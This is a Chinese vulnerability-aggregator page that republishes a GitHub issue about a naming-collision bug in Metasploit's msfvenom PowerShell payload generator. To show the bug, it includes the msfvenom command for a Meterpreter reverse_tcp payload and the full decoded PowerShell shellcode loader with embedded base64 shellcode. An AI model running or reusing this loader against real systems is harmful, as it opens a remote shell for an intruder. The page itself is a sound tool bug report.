msfvenom psh-cmd payload's random powershell function name collides with builtin commands

漏洞信息

漏洞名称: msfvenom psh-cmd payload’s random powershell function name collides with builtin commands

漏洞类型: 其他

漏洞等级: 中危

漏洞描述: ### 受影响产品
Metasploit Framework 是一个广泛使用的渗透测试工具,它提供了漏洞开发、测试和执行的功能。msfvenom 是 Metasploit 中的一个有效载荷生成器,用于创建各种类型的恶意代码,以便在渗透测试中使用。此问题影响的是 msfvenom 生成的 PowerShell 命令(psh-cmd)有效载荷。

漏洞解释

此漏洞属于命名冲突问题,具体表现为 msfvenom 生成的 PowerShell 脚本中随机生成的函数名可能与 PowerShell 内置命令的别名发生冲突。例如,报告中提到的 rv 函数与 PowerShell 的 Remove-Variable 命令的别名 rv 冲突。这种冲突可能导致脚本执行失败或行为异常,因为 PowerShell 会优先解析内置命令而非用户定义的函数。

影响分析

虽然此漏洞不会直接导致远程代码执行或数据泄露,但它会影响渗透测试的可靠性和有效性。如果生成的脚本因为命名冲突而无法正确执行,可能会阻碍测试进程,甚至暴露测试活动。此外,这种问题在自动化脚本中尤其棘手,因为它依赖于随机生成的名称,难以预测和复现。此问题不需要认证即可触发,且在某些情况下可能被自动化工具利用,导致测试失败。

产品厂商: rapid7

产品名称: metasploit-framework

影响版本: 6.4.68

来源: https://github.com/rapid7/metasploit-framework/issues/20331

类型: rapid7/metasploit-framework:github issues

来源概述

Steps to reproduce

How’d you do it?

  1. msfvenom -p windows/x64/meterpreter/reverse_tcp -f psh-cmd LHOST=x.x.x.x LPORT=xxx
  2. Unwrap the base64 part inside the payload to reveal the actual powershell script
  3. Unwrap the compression and base64 part once more
  4. Now we get the actual evil powershell script that loads the shellcode
  5. Notice variables and functions have random names

Were you following a specific guide/tutorial or reading documentation?

No

Expected behavior

variable and function names shouldn’t collide with existing ones

Current behavior

There’s a chance that it will collide. In my case:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
function xSb5N {
        Param ($nmO, $u3F)
        $rZx = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

        return $rZx.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($rZx.GetMethod('GetModuleHandle')).Invoke($null, @($nmO)))), $u3F))
}

function rv {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $hepi,
                [Parameter(Position = 1)] [Type] $tB3YT = [Void]
        )

        $qI = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $qI.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $hepi).SetImplementationFlags('Runtime, Managed')
        $qI.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tB3YT, $hepi).SetImplementationFlags('Runtime, Managed')

        return $qI.CreateType()
}

[Byte[]]$wU7 = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSSDHSZUiLUmBIi1IYSItSIFFWSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZNMclI/8lBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKhvAUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V")
[Uint32]$xMiq = 0
$wqX = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll VirtualAlloc), (rv @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wU7.Length,0x3000, 0x04)

[System.Runtime.InteropServices.Marshal]::Copy($wU7, 0, $wqX, $wU7.length)
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll VirtualProtect), (rv @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($wqX, [Uint32]$wU7.Length, 0x10, [Ref]$xMiq)) -eq $true) {
        $a9ffs = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll CreateThread), (rv @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$wqX,[IntPtr]::Zero,0,[IntPtr]::Zero)
        [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((xSb5N kernel32.dll WaitForSingleObject), (rv @([IntPtr], [Int32]))).Invoke($a9ffs,0xffffffff) | Out-Null
}

2nd function collides with Remove-Variable‘s shortname: rv

Metasploit version

6.4.68

Additional Information

None

Github Poc
#rapid7/metasploit-framework:github issues #其他
msfvenom psh-cmd payload's random powershell function name collides with builtin commands
http://example.com/2025/07/15/github_224117259/
作者
lianccc
发布于
2025年7月15日
许可协议